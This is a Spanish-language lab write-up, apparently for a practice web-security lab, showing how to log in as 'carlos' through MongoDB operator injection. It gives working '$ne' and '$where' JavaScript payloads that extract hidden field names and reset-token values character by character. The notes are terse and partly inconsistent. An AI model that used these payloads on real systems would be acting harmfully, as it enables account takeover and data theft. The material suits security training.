# 04 Lab: Exploiting NoSQL operator injection to extract unknown fields ## Objetivo > The user lookup functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection. > > To solve the lab, log in as `carlos`. ## Solución Cambia el valor del parámetro `password` de 'invalid' a `{"$ne":"invalid"}`, y luego envía la solicitud. Observa que ahora recibes un mensaje de error que dice 'Cuenta bloqueada'. No puedes acceder a la cuenta de Carlos, pero esta respuesta indica que el operador `$ne` ha sido aceptado y que la aplicación es vulnerable." ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-edb5ed3fc04759e1af00cf51ca26582d780d796c%2Fimage.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-ea7cdfcfc6e890a675d762cfb32616bf7cb743a9%2Fimage%201.png?alt=media) Cambia `"$where": "0"` a `"$where": "1"`, y luego vuelve a enviar la solicitud. Observa que recibes un mensaje de error que dice 'Cuenta bloqueada'. Esto indica que el JavaScript en la cláusula `$where` está siendo evaluado ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-ee9c3f5e681c753ba4bab06793fcc80967503c09%2Fimage%202.png?alt=media) "$where":"Object.keys(this)\[1].match('^.{}.\*')” ```jsx { "_id" : 'xxxxxx', "username":"carlos", "password":{"$ne":"invalid"}, "posible_campo" : 'valor_campo' } "$where":"function(){ if (Object.keys(this)[1].match('username')) return 1; else 0;}" "$where":"function(){ if (Object.keys(this)[1].length == 6 ) return 1; else 0;}" { "username":"carlos", "password":{"$ne":"invalid"}, "$where": "1" } ``` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-a6a0dd7a22b5f795be7f6c56b93a33759bbdc1af%2Fimage%203.png?alt=media) ```jsx "$where":"function(){ if (Object.keys(this)[3].length == 6 ) return 1; else 0;}" Asi que tiene 5 caracteres ``` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-36e5608d2e67a567f378e3c3c3990ed6425f58b2%2Fimage%204.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-5e96b8d4cfd4c9cead8fd3c0f56627234a0815bc%2Fimage%205.png?alt=media) ```jsx "$where":"function(){ if (Object.keys(this)[3].match(/^$a$/)) return 1; else 0;}" Vamos a sacar con esto el primer caracter, y asi lo hacemos sucesivamente Campo del usuario: email ``` ```jsx a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ``` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-77b91f0207cb1647f0df924806e59e687010e520%2Fimage%206.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-0c21a0a2ff8485cf1c4cfd8f66b04310ed467744%2Fimage%207.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-cba3ae2ce3aa87e8bdf46471fce6908cfa0391fe%2Fimage%208.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-17b885920550e243a8aa6695bfdd42d73af65e0f%2Fimage%209.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-fce5d33b7008af95a8f39e722433cd32a40b7a82%2Fimage%2010.png?alt=media) *** *** ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-856ee3c242bf76e13849f8ed48409355ebd02d77%2Fimage%2011.png?alt=media) ```jsx // hidden field name is "mail" "$where":"function(){ if (this.email.length == 1 ) return 1; else 0;}" // Son 25 caracteres "$where":"function(){ if (this.email.match(/^$a$/)) return 1; else 0;}" "$where":"function(){ if (this.email.match('^.{$NUMBER$}$CARACTER$.*')) return 1; else 0;}" "$where":"function(){ if (this.email.match('^.{§1§}§A§.*')) return 1; else 0;}" {§§}§§ ('^.{§§}§§.*') carlos@carlos-montoya.net unlockToken ``` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-201be0ab5ed1b5d6594ba0e10e14dd81a278f9ae%2Fimage%2012.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-3764e8c3ba32f5ff3cbe3d3efe6edcb0e28a20c3%2Fimage%2013.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-bc4ec6fad9c9b8c02afd276c5ada58955ded352a%2Fimage%2014.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-31816c2d52286fbcb549c838851301a7e0a13f00%2Fimage%2015.png?alt=media) Otro campo aparte del email ```jsx {"username":"carlos","password":{"$ne":"invalid"}, "$where":"function(){ if (Object.keys(this)[4].length == §6§ ) return 1; else 0;}" } Son 11 caracteres "$where":"function(){ if (Object.keys(this)[4].match(/^$a$/)) return 1; else 0;}" unlockToken 9457f5cff38fff0b "$where":"function(){ if (Object.keys(this)[4].match(/^f§a§/)) return 1; else 0;}" "$where":"function(){ if (Object.keys(this)[4].match('^.{§1§}§1§.*')) return 1; else 0;}" forgotPwd "$where":"function(){ if (this.forgotPwd.match(/^$a$/)) return 1; else 0;}" "$where":"function(){ if (this.forgotPwd.match('^.{§1§}§A§.*')) return 1; else 0;}" db10648a240ccfa1 ``` ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-3271830522849ae3f697afb293da5adbdb70cd39%2Fimage%2016.png?alt=media) ![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-508a964b9bcf8e011605c5cbc24592f0aac804a2%2Fimage%2017.png?alt=media) ![Untitled](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-2e1215355a779e00cd2a2793558298487b6a5df9%2FUntitled.png?alt=media)